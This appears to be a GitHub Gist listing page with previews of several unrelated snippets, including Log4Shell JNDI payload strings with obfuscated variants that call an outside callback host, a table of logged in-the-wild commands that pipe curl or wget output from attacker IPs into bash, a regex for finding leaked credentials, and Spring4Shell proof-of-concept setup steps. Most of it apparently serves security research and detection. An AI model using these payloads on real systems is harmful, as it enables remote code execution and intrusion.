cwyalpha cwyalpha
smx-smx
/ XZ Backdoor Analysis
Last active
October 12, 2024 07:23
[WIP] XZ Backdoor Analysis and symbol mapping
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| XZ Backdoor symbol deobfuscation. Updated as i make progress |
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
hwchase17
/ claude-ai-plugins.py
Created
March 27, 2023 01:56
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from langchain.llms import Anthropic | |
| from langchain.agents import load_tools, initialize_agent | |
| from langchain.tools import AIPluginTool | |
| PREFIX = """\n\nHuman: Answer the following questions as best you can. You have access to the following tools:""" | |
| SUFFIX = """Begin! | |
| Question: {input} | |
| \n\nAssistant: | |
| Thought:{agent_scratchpad}""" |
h4x0r-dz
/ Generic keys
Created
May 5, 2022 09:15
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| (?i)((access_key|access_token|admin_pass|admin_user|algolia_admin_key|algolia_api_key|alias_pass|alicloud_access_key|amazon_secret_access_key|amazonaws|ansible_vault_password|aos_key|api_key|api_key_secret|api_key_sid|api_secret|api.googlemaps AIza|apidocs|apikey|apiSecret|app_debug|app_id|app_key|app_log_level|app_secret|appkey|appkeysecret|application_key|appsecret|appspot|auth_token|authorizationToken|authsecret|aws_access|aws_access_key_id|aws_bucket|aws_key|aws_secret|aws_secret_key|aws_token|AWSSecretKey|b2_app_key|bashrc password|bintray_apikey|bintray_gpg_password|bintray_key|bintraykey|bluemix_api_key|bluemix_pass|browserstack_access_key|bucket_password|bucketeer_aws_access_key_id|bucketeer_aws_secret_access_key|built_branch_deploy_key|bx_password|cache_driver|cache_s3_secret_key|cattle_access_key|cattle_secret_key|certificate_password|ci_deploy_password|client_secret|client_zpk_secret_key|clojars_password|cloud_api_key|cloud_watch_aws_access_key|cloudant_password|cloudflare_api_key|cloudflare_auth_k |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| At this point, it is probably easier to just use something like this: https://github.com/reznok/Spring4Shell-POC | |
| - clone https://spring.io/guides/gs/handling-form-submission/ | |
| - you can skip right to gs-handling-form-submission/complete, no need to follow the tutorial | |
| - modify it so that you can build a war file (https://www.baeldung.com/spring-boot-war-tomcat-deploy) | |
| - install tomcat9 + java 11 (i did it on ubuntu 20.04) | |
| - deploy the war file | |
| - update the PoC (https://share.vx-underground.org/) to write the tomcatwar.jsp file to webapps/handling-form-submission instead of webapps/ROOT |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ${jndi:ldap://127.0.0.1:1389/ badClassName} | |
| ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit} | |
| ${${::-j}ndi:rmi://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit} | |
| ${jndi:rmi://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk} | |
| ${${lower:jndi}:${lower:rmi}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit} | |
| ${${lower:${lower:jndi}}:${lower:rmi}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit} | |
| ${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit} | |
| ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit} | |
| ${${upper:jndi}:${upper:rmi}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit} | |
| ${${upper:j}${upper:n}${lower:d}i:${upper:rmi}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| b64decoded | hits | |
|---|---|---|
| (curl -s 45.155.205.233:5874/<IP_ADDRESS>||wget -q -O- 45.155.205.233:5874/<IP_ADDRESS>)|bash | 2056 | |
| (curl -s 80.71.158.12/lh.sh||wget -q -O- 80.71.158.12/lh.sh)|bash | 162 | |
| (curl -s 80.71.158.44/lh.sh||wget -q -O- 80.71.158.44/lh.sh)|bash | 2 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| [General] | |
| # ShadowRocket 现已支持 DoH / DoT | |
| # 您可以根据需求自行决定选用 DNS 服务器的种类和组合方式,例如:混用服务器来实现最佳解析速度;单独 DoH 使用来达到最佳安全性和最低污染度。 | |
| dns-server = https://doh.pub/dns-query, https://dns.alidns.com/dns-query | |
| bypass-tun = 10.0.0.0/8, 100.64.0.0/10, 127.0.0.0/8, 169.254.0.0/16, 172.16.0.0/12, 192.0.0.0/24, 192.0.2.0/24, 192.168.0.0/16, 192.88.99.0/24, 198.18.0.0/15, 198.51.100.0/24, 203.0.113.0/24, 224.0.0.0/4, 255.255.255.255/32, 0.0.0.0/31, ::ffff:0.0.0.0/31 | |
| skip-proxy = localhost, *.local, injections.adguard.org, local.adguard.org, captive.apple.com, guzzoni.apple.com, 0.0.0.0/8, 10.0.0.0/8, 17.0.0.0/8, 100.64.0.0/10, 127.0.0.0/8, 169.254.0.0/16, 172.16.0.0/12, 192.0.0.0/24, 192.0.2.0/24, 192.168.0.0/16, 192.88.99.0/24, 198.18.0.0/15, 198.51.100.0/24, 203.0.113.0/24, 224.0.0.0/4, 240.0.0.0/4, 255.255.255.255/32 | |
| bypass-system = true | |
| ipv6 = true | |
| update-url = https://git.io/JfV0x | |
| [Rule] |
aunyks
/ snakecoin.py
Last active
April 29, 2024 22:52
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import hashlib as hasher | |
| import datetime as date | |
| # Define what a Snakecoin block is | |
| class Block: | |
| def __init__(self, index, timestamp, data, previous_hash): | |
| self.index = index | |
| self.timestamp = timestamp | |
| self.data = data | |
| self.previous_hash = previous_hash |
VincentSit
/ update_gfwlist.sh
Last active
October 14, 2024 09:52
Automatically update the PAC for ShadowsocksX. Only tested on OS X. (Deprecated)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # update_gfwlist.sh | |
| # Author : VincentSit | |
| # Copyright (c) http://xuexuefeng.com | |
| # | |
| # Example usage | |
| # | |
| # ./whatever-you-name-this.sh | |
| # | |
| # Task Scheduling (Optional) |
NewerOlder